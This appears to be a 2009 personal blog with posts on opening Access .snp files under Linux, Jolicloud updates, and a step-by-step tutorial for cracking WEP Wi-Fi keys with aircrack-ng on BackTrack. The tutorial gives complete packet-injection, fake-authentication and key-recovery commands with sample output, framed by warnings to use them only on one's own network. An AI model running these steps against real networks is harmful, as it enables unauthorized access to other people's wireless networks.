Tuesday 22 September 2009

The trouble with .snp files.

Today I received a file with the .snp extension.

Never had one of those before... and a quick search on Google revealed all.
"The SNP file format is used by Microsoft Access to store Report Snapshots in a single file which can be viewed and printed by the Microsoft Snapshot Viewer, available as a free download from Microsoft (runs on Windows only)." See the Wiki.


As a Linux user, how do you open it?

I tried to open it with the very powerful and increasingly popular, Open Office suite. But the format wasn't recognised. Which was unusual.
I then tried to open it online with the Google Docs application and also the other popular online office suite, Zoho, but it was an unsupported format in both.

Can you convert it to a format which is easily read?

Converting it to .pdf proved unsuccessful with every one of the online format converters I tried. There are, apparently, a couple of commercial packages that will do it, but they are Windows only applications.

In fact, I couldn't find a single native application for Linux that supported the .snp format.
And then, after much research, I discovered that this was the same situation for Mac OS users, too.

What would a Windows user do?

The average user would receive the file, double click it and then wonder why it won't open.
A Windows user, even if they have Access installed, would have to download and install the MS Snapshot Viewer. This is because Access, although it can produce .snp files, cannot open .snp files. The Snapshot Viewer does exactly what it says on the tin and it cannot convert files to other formats.
This is bizarre. Why enable the creation of a file and not provide a built in solution for viewing it?

So, is there a workaround for non Windows users?

Of course there is. Basically, it involves using an emulator called Wine to run the MS Snapshot Viewer. A good tutorial can be found on the Ubuntu forums, here. This worked well for me, but toying with the command line isn't for everyone.
I don't know enough about using Wine on Mac OS and I couldn't find anything to confirm whether or not this tutorial would be of any help to Mac users.

Can the office help? Is there another way?

The office can certainly help, but it requires a little effort on their part.
An add-on is available for Access that allows the direct printing of .pdf files, so cutting out the unwanted hassle of producing .snp files and then converting them to .pdf. It can be found here.
It has also been suggested that exporting the reports as html may work, though this is unlikely to produce the desired results.

Why do I keep banging on about .pdf?

Files with the .pdf extension can be read by an extraordinary number of applications on more operating systems and devices than I care to mention. They can also be opened by most of the online office suites, which is a lifesaver for those who prefer to use one of the ever expanding number of mobile internet devices.

As an instance, and I'm using Google as an example not a rule, the file with the .pdf extension is mailed to my Gmail account. I could use then use the nearest Linux/Mac/BSD/Windows machine or net enabled hand held device to access my account and then open the file in Google Docs. Easy.

As cloud computing and open source operating systems mature and their user numbers increase, it's important to be aware of the end user's requirements and limitations.

Tuesday 15 September 2009

Jolicloud Gets Spotified With A Flashy Chrome Finish.

I installed Jolicloud a little while ago to an 8GB stick and have dipped in and out of it on a fairly regular basis. And now it's getting more use than Mint.

And all it took was some updates.

The first one to catch my eye was the appearance of Spotify, the music streaming service. Jolicloud had obtained invitations for the free version, supported by ads, for Jolicloud users and a one click install was added to the applications tab on the dashboard. It's not a native version, it runs under Wine, but it's still a step in the right direction. Purists may disagree. New users will be happy.







The other update introduced the Google Chrome browser with Flash already added. Yes, it's still nowhere near ready, but I've had no problems while writing this entry and I can watch flash video (YouTube, BBC iPlayer and Channel 4's 4OD service) in full screen with none of the choppiness that seems to blight a great many other distros at the moment. It starts almost instantly and it kicks FireFox's arse in the speed department.







I keep reading forum posts that say Jolicloud is just Ubuntu NBR with codecs, netbook drivers, Prism etc. added.

I say Jolicloud is greater than the sum of it's parts.

Wednesday 9 September 2009

Backtrack 3 Final On The 900

This is a simple guide to cracking WEP.

First off, this guide is for the EeePC 900 using BackTrack 3 Final, live, from a USB drive. I cannot guarantee that it will work with your machine.

Second, I am not an expert, so don’t start firing questions at me.

Third, this guide is a simplified version of several tutorials I have read.

Fourth, I have used this guide successfully a number of times, so I know it works for me.

Fifth, type carefully. One tiny mistake = Much hair pulling.

Lastly, cracking other people’s WEP keys and using their bandwidth without permission is theft and is illegal in the UK and many other countries.

So don't do it.

Please, use this guide wisely…

__________________________________________________________________

__________________________________________________________________

LET’S FIND A NETWORK TO CRACK!!

__________________________________________________________________

Open a terminal. Enter:

airodump-ng start ath0

The reply should look similar to this:

CH 8 ][ Elapsed: 8 s ][ 2009-06-09 12:11

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:22:3F:37:AC:0E 2 3 0 0 6 54 WPA TKIP PSK madangupta
00:1F:9F:43:78:65 3 4 0 0 11 54 WEP WEP Thomson12BAE8
00:1A:C4:D0:26:A1 6 6 0 0 5 54. WEP WEP BTBusinessHub-246
00:1A:C4:D0:26:A3 6 9 0 0 5 54. WPA TKIP PSK BT Fusion-3246
00:14:7F:DC:1A:13 24 22 0 0 6 54 WEP WEP Johnsrouter
00:1D:68:09:A6:93 20 23 0 0 1 54 WEP WEP BTHomeHub-17CE

BSSID STATION PWR Rate Lost Packets Probes

Then note the details of the network you want to use. Remember, it’s WEP encryption we’re looking for. A PWR rating of 20 and above is usually strong enough for packet injection to work, more of which later. The details you will need are the ESSID, BSSID and Channel Number.
Then hit Ctr+C to stop airodump.

The network I am going to be attempting to crack is my own. Because it's legal.

Cracking anything other is illegal.

So don't fuck about.

The following are my details.
ESSID: Johnsrouter
BSSID: 00:14:7F:DC:1A:13
Channel: 6
My wireless card’s Mac address: 00:0F:B5:88:AC:82 (you will find yours later).

__________________________________________________________________

__________________________________________________________________

LET’S GO!!

__________________________________________________________________

STEP 1 - Start the wireless card in monitor mode on the same channel as the access point.

Open a terminal. Enter:

airmon-ng stop ath0

The system should reply:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter:

iwconfig

The reply should look similar to this:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

Now, enter the following command to start the wireless card in monitor mode on channel 6.:

airmon-ng start wifi0 6

Replace the 6 with whatever channel your access point is using.

The reply should look similar to this

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Enter:

iwconfig

The reply should look similar to this:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Here, you should make a note of your machine’s mac addresss. You can see mine above: 00:0F:B5:88:AC:82

__________________________________________________________________

__________________________________________________________________

STEP 2 - Test Wireless Device Packet Injection

Now to make sure you’re able to use packet injection.

Enter:

aireplay-ng -9 -e Johnsrouter -a 00:14:7F:DC:1A:13 ath0

Where:
-9 means injection test
-e Johnsrouter is the wireless network name (replace it with yours)
-a 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)

The reply should look similar to this:

09:23:35 Waiting for beacon frame (BSSID: 00:14:7F:DC:1A:13) on channel 6
09:23:35 Trying broadcast probe requests…
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests…
09:23:37 00:14:7F:DC:1A:13 - channel: 6 - ‘Johnsrouter’
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%

On the last line it says 100%. You need a high percentage for successful injection.
If it’s quite low, you may be too far from the access point for injection to work.

__________________________________________________________________

__________________________________________________________________

STEP 3 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated.

Open a new terminal.

Enter:

airodump-ng -c 6 –bssid 00:14:7F:DC:1A:13 -w output ath0

Where:

-c 6 is the channel for the wireless network (replace it with yours).
–bssid 00:14:7F:DC:1A:13 is the access point’s MAC address (replace it with yours). Yes, it is a a double hyphen for this one.
-w capture is file name prefix for the file which will contain the IVs.

While the injection is taking place (later), the reply should look similar to this:

CH 6 ][ Elapsed: 11 mins ][ 2009-06-09 12:15

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:7F:DC:1A:13 42 100 5240 178307 338 6 54 WEP WEP Johnsrouter

BSSID STATION PWR Lost Packets Probes

00:14:7F:DC:1A:13 00:0F:B5:88:AC:82 42 0 183782

__________________________________________________________________

__________________________________________________________________

STEP 4 - Use aireplay-ng to do a fake authentication with the access point

Open a new terminal.

Enter:

aireplay-ng -1 0 -e Johnsrouter -a 00:14:7F:DC:1A:13 -h 00:0F:B5:88:AC:82 ath0

Where:

-1 means fake authentication
0 is the reassociation timing in seconds
-e Johnsrouter is the wireless network name (replace it with yours)
-a 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
-h 00:0F:B5:88:AC:82 is our card MAC addresss (replace it with yours)

The reply should look similar to this:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

_________________________________________________________________

_________________________________________________________________

STEP 5 - Start aireplay-ng in ARP request replay mode

Open a new terminal.

Enter:

aireplay-ng -3 -b 00:14:7F:DC:1A:13 -h 00:0F:B5:88:AC:82 ath0

Where:

-b 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
-h 00:0F:B5:88:AC:82 is our card MAC addresss (replace it with yours)

The reply should look similar to this:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.

__________________________________________________________________

__________________________________________________________________

STEP 6 - Run aircrack-ng to obtain the WEP key

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.

Open a new terminal.

Enter:

aircrack-ng -z -b 00:14:7F:DC:1A:13 output*.cap

Where:

-z invokes the PTW WEP-cracking method.
-b 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours).

Generally, you will need about 20,000 packets for 64-bit and between 40,000 and 85,000 packets for 128 bit.
This can vary wildly so, be patient.

This output can run to a few pages and it may stop, telling you that it will attempt again.
Again, be patient.

The reply (if successful) should look similar to this:

Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

So, the key is:
[ 12:34:56:78:90 ]

Remove the brackets and colons so the key looks like this:
1234567890

and that’s the key you enter when asked for the WEP key by your wireless manager.